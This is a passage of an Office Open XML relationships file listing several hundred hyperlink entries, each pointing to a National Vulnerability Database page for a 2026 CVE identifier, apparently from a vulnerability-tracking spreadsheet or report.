Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62243" TargetMode="External" Id="rId1161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62292" TargetMode="External" Id="rId1162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId1163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId1164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId1165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62865" TargetMode="External" Id="rId1166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63188" TargetMode="External" Id="rId1167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63383" TargetMode="External" Id="rId1168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63384" TargetMode="External" Id="rId1169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63403" TargetMode="External" Id="rId1170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64836" TargetMode="External" Id="rId1171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64837" TargetMode="External" Id="rId1172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64838" TargetMode="External" Id="rId1173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64850" TargetMode="External" Id="rId1174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64852" TargetMode="External" Id="rId1175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66360" TargetMode="External" Id="rId1176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66840" TargetMode="External" Id="rId1177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67195" TargetMode="External" Id="rId1178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67198" TargetMode="External" Id="rId1179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67200" TargetMode="External" Id="rId1180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67281" TargetMode="External" Id="rId1181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67299" TargetMode="External" Id="rId1182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67301" TargetMode="External" Id="rId1183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67304" TargetMode="External" Id="rId1184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67327" TargetMode="External" Id="rId1185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67331" TargetMode="External" Id="rId1186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67581" TargetMode="External" Id="rId1187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68494" TargetMode="External" Id="rId1188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68899" TargetMode="External" Id="rId1189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69091" TargetMode="External" Id="rId1190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69095" TargetMode="External" Id="rId1191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69096" TargetMode="External" Id="rId1192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69220" TargetMode="External" Id="rId1193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6924" TargetMode="External" Id="rId1194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69249" TargetMode="External" Id="rId1195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69263" TargetMode="External" Id="rId1196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70453" TargetMode="External" Id="rId1197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70464" TargetMode="External" Id="rId1198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70492" TargetMode="External" Id="rId1199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70619" TargetMode="External" Id="rId1200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71190" TargetMode="External" Id="rId1201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71404" TargetMode="External" Id="rId1202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71491" TargetMode="External" Id="rId1203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71961" TargetMode="External" Id="rId1204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71965" TargetMode="External" Id="rId1205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71966" TargetMode="External" Id="rId1206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71981" TargetMode="External" Id="rId1207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72730" TargetMode="External" Id="rId1208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72767" TargetMode="External" Id="rId1209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72779" TargetMode="External" Id="rId1210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72781" TargetMode="External" Id="rId1211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72819" TargetMode="External" Id="rId1212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72826" TargetMode="External" Id="rId1213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72827" TargetMode="External" Id="rId1214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72837" TargetMode="External" Id="rId1215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72840" TargetMode="External" Id="rId1216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72870" TargetMode="External" Id="rId1217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72874" TargetMode="External" Id="rId1218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72884" TargetMode="External" Id="rId1219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73062" TargetMode="External" Id="rId1220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73081" TargetMode="External" Id="rId1221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId1222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId1223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73413" TargetMode="External" Id="rId1224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73614" TargetMode="External" Id="rId1225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73615" TargetMode="External" Id="rId1226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73693" TargetMode="External" Id="rId1227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74787" TargetMode="External" Id="rId1228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74792" TargetMode="External" Id="rId1229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75124" TargetMode="External" Id="rId1230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75133" TargetMode="External" Id="rId1231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75584" TargetMode="External" Id="rId1232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId1233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75813" TargetMode="External" Id="rId1234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75836" TargetMode="External" Id="rId1235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75840" TargetMode="External" Id="rId1236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75853" TargetMode="External" Id="rId1237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75859" TargetMode="External" Id="rId1238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75914" TargetMode="External" Id="rId1239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75915" TargetMode="External" Id="rId1240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75960" TargetMode="External" Id="rId1241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76224" TargetMode="External" Id="rId1242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76639" TargetMode="External" Id="rId1243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77101" TargetMode="External" Id="rId1244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77102" TargetMode="External" Id="rId1245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77103" TargetMode="External" Id="rId1246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77105" TargetMode="External" Id="rId1247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId1248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77120" TargetMode="External" Id="rId1249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77298" TargetMode="External" Id="rId1250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77354" TargetMode="External" Id="rId1251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77357" TargetMode="External" Id="rId1252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77393" TargetMode="External" Id="rId1253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79707" TargetMode="External" Id="rId1254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79756" TargetMode="External" Id="rId1255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79987" TargetMode="External" Id="rId1256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79989" TargetMode="External" Id="rId1257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81640" TargetMode="External" Id="rId1258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId1259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId1260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82538" TargetMode="External" Id="rId1261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82639" TargetMode="External" Id="rId1262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82882" TargetMode="External" Id="rId1263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83605" TargetMode="External" Id="rId1264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83606" TargetMode="External" Id="rId1265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83607" TargetMode="External" Id="rId1266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83608" TargetMode="External" Id="rId1267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83609" TargetMode="External" Id="rId1268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83612" TargetMode="External" Id="rId1269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84190" TargetMode="External" Id="rId1277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84202" TargetMode="External" Id="rId1278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84208" TargetMode="External" Id="rId1279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84304" TargetMode="External" Id="rId1280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84476" TargetMode="External" Id="rId1281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84482" TargetMode="External" Id="rId1282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84694" TargetMode="External" Id="rId1283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84715" TargetMode="External" Id="rId1284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84732" TargetMode="External" Id="rId1285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85147" TargetMode="External" Id="rId1286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85155" TargetMode="External" Id="rId1287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85169" TargetMode="External" Id="rId1288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85174" TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85175" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85180" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85212" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85429" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85431" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85436" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85441" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85442" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85443" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85444" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85445" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85446" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85447" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85448" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85449" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85450" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85452" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85540" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85581" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85584" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85585" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85604" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85607" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85608" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85610" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85612" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85617" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85623" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85626" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85664" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85686" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85687" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85691" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85699" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85786" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86075" 